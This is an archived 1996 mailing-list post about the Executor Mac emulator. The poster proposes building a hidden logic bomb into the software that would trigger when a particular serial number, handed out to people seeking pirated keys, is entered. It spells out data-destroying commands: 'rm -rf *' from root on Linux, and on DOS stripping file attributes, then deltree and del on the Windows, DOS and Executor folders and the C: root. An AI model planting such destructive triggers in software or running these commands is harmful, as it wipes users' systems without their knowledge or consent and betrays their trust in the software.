home *** CD-ROM | disk | FTP | other *** search
/ Executor 2.0 / executorv2.0.iso / pc / dos / extra / docs / maillist / text / archive.96 / text7703.txt < prev    next >
Encoding:
Internet Message Format  |  1996-07-25  |  1.1 KB

  1. Date: Sat, 29 Jun 1996 10:31:05 +1000
  2. Organization: University of Southern Queensland
  3. Lines: 25
  4. Message-ID: <Pine.HPP.3.91.960629102103.16244A-100000@helios.usq.edu.au>
  5. NNTP-Posting-Host: helios.usq.edu.au
  6. Mime-Version: 1.0
  7. Content-Type: TEXT/PLAIN; charset=US-ASCII
  8. To: executor@ardi.com
  9. X-MailNews-Gateway: From newsgroup comp.emulators.mac.executor
  10. Sender: owner-executor@ardi.com
  11. Precedence: bulk
  12.  
  13. Include some code in the unlockable versions that will
  14. 'do a little mischief'.  Something like 
  15.  
  16. cd /
  17. rm -rf * for linux and the following for the DOS version
  18.  
  19. cd\
  20. attrib -rhs c:\*.*
  21. deltree /y c:\windows
  22. deltree /y c:\dos
  23. deltree /y c:\executor
  24. del c:\*.*
  25.  
  26. Make this code execute when a specific serial# is entered.
  27. Then when some dweeb criminal posts a 'gimme keys please' message,
  28. just mail him the destructive keys and let Executor do the rest.
  29.  
  30. This idea really does
  31.  have some merit;)
  32.  
  33. Then mail them 30 minutes later with a message like, 
  34. "Please can someone send me $150 dollars, I can't wait until we shrink 
  35. wrap E2. Please, this lack of money is a real annoyance when I try to buy 
  36. stuff.  And oh yes... have a nice day:)"
  37.  
  38.  
  39.